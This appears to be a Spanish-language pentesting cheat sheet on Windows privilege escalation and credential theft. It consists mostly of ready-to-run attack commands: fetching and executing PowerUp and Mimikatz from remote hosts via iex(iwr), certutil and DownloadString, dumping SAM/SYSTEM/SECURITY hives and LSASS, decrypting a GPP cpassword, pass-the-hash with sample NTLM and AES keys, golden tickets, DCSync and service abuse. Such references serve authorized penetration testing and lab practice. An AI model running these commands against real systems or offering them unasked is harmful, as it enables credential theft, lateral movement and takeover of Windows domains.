Windows

Enumeración automatizada

WinPEAS

https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS

Última versión y binarios: https://github.com/peass-ng/PEASS-ng/releases

iwr https://github.com/peass-ng/PEASS-ng/releases/download/20241007-05f777b2/winPEASx64.exe -outputfile winpeas64.exe

Otras formas de transferir ficheros: Misc

Ejecución básica:

.\winPEASx64.exe

Para entornos más restringidos, se puede usar un loader que permita cargar y ejecutar en memoria el programa. Por ejemplo:

Windows

.\sloader.exe -f C:\Pentest\Tools\winPEASx64.exe -p notcolor log

PowerUp

https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1

. C:\AD\Tools\PowerUp.ps1

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)

Se enumeran las posibles vías de elevación de privilegios y se exporta la información a un fichero html:

Invoke-AllChecks -HTMLReport

PrivescCheck

https://github.com/itm4n/PrivescCheck

git clone "https://github.com/itm4n/PrivescCheck.git"

Invoke-PrivescCheck -Extended -Audit -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML,CSV,XML

Vulnerabilidades

Actualizaciones vía WSUS

WSUS (Windows Server Update Services) es un servicio que permite gestionar la distribución de actualizaciones en redes corporativas con sistemas Windows.

Es un servidor centralizado que descarga y distribuye parches de seguridad y actualizaciones en los clientes de la red local.

Para comprobar si el servidor WSUS es vulnerable a CVE-2020-1013, se tienen que dar dos condiciones:

El servidor WSUS tiene que utilizar el protocolo HTTP en vez de HTTPS. Para comprobar cuál servidor WSUS se está utilizando:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
      WUServer    REG_SZ    http://xtormin.local:8530

Que el uso del servidor WSUS esté activado. Para ello, el resultado del siguiente registro debe ser igual a 0:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer

Writeup de la investigación y presentación en la BlackHat:

Otras referencias:

Escalada de privilegios

Equipo conectado con Azure

wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1

Otras formas de transferir ficheros: Misc

Azure-ADConnect -server 127.0.0.1 -db ADSync

Servicio modificable

Identificación

Herramienta

Comando

PowerUp

Get-ModifiableService

Ejemplo de explotación

Herramienta

Comando

PowerUp

Invoke-ServiceAbuse -Name 'WebServer' -UserName 'xtormincorp\xtormin' -Verbose

Máquinas del dominio con acceso privilegiado

Buscar máquinas donde el usuario tiene permisos de administrador local:

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess

winrs:

winrs -r:<Nombre de la máquina> cmd
set username
set computername

PSSession:

Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
$env:username

Extracción de credenciales

Obtención de SAM, SYSTEM, SECURITY

reg save HKLM\SAM C:\WINDOWS\Temp\sam.dmp
reg save HKLM\SYSTEM C:\WINDOWS\Temp\system.dmp
reg save HKLM\security C:\WINDOWS\Temp\security.dmp

samdump2 system sam

/home/kali/tools/impacket/examples/secretsdump.py -sam sam.dmp -system system.dmp -security security.dmp LOCAL

GPP - Group Password Policy

cd %windir%\system32\grouppolicy

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="jdBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

gpp-decrypt jdBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Mimikatz

certutil -urlcache -split -f http://192.168.119.142/mimikatz.exe C:\Windows\Temp\mimikatz.exe && C:\Windows\Temp\mimikatz.exe

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds

privilege::debug
log
log customlogfilename.log

token::elevate

Dump LSASS

privilege::debug
token::elevate
sekurlsa::logonpasswords

Seckurlsa

sekurlsa::ekeys

sekurlsa::logonpasswords
sekurlsa::logonPasswords full

sekurlsa::tickets
sekurlsa::tickets /export

sekurlsa::tspkg

sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:4c13687d23a3a88e57fc9ef8bb4cdf2f /run:cmd

sekurlsa::minidump c:\Windows\Temp\lsass.dmp

Kerberos

kerberos::list /export

kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

DSync

lsadump::dcsync /user:domain\krbtgt /domain:xor.com
lsadump::dcsync /domain:xor.com /all /csv
lsadump::dcsync /domain:xor.com /user:administrator

lsadump::lsa /inject

token::elevate
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

Vault

vault::cred
vault::cred /patch
vault::list

Terminal Services

ts::multirdp
ts::logonpasswords

Pass-the-Hash

sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:cc36cf7a8514893efccd332446158b1a

sekurlsa::pth /user:Administrator /domain:xtormincorp.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:{NTLM_hash} /run:cmd.exe

Credenciales en eventos de logs

Se parsean los logs de Windows Event ID 4688 para extraer credenciales:

nxc smb 192.168.1.100 -u $USER -p $PASS -M eventlog_creds

Referencias

WADComs - https://wadcoms.github.io/#+Privilege%20Escalation
Track 3 15 Goodbye Obfuscation Hello Invisi Shell Hiding Your Powershell Script in Plain Sight Omer - https://www.youtube.com/watch?v=Y3oMEiySxcc
https://www.atomicredteam.io/atomic-red-team
https://etchedshell.medium.com/powerup-experience-42f3d7904e79

Anterior.NET SiguienteActive directory

Última actualización hace 5 meses

hashtagEnumeración automatizada

hashtagWinPEAS

hashtagPowerUp

hashtagPrivescCheck

hashtagVulnerabilidades

hashtagActualizaciones vía WSUS

hashtagEscalada de privilegios

hashtagEquipo conectado con Azure

hashtagServicio modificable

hashtagMáquinas del dominio con acceso privilegiado

hashtagExtracción de credenciales

hashtagObtención de SAM, SYSTEM, SECURITY

hashtagGPP - Group Password Policy

hashtagMimikatz

hashtagDump LSASS

hashtagSeckurlsa

hashtagKerberos

hashtagDSync

hashtagVault

hashtagTerminal Services

hashtagPass-the-Hash

hashtagCredenciales en eventos de logs

hashtagReferencias

Enumeración automatizada

WinPEAS

PowerUp

PrivescCheck

Vulnerabilidades

Actualizaciones vía WSUS

Escalada de privilegios

Equipo conectado con Azure

Servicio modificable

Máquinas del dominio con acceso privilegiado

Extracción de credenciales

Obtención de SAM, SYSTEM, SECURITY

GPP - Group Password Policy

Mimikatz

Dump LSASS

Seckurlsa

Kerberos

DSync

Vault

Terminal Services

Pass-the-Hash

Credenciales en eventos de logs

Referencias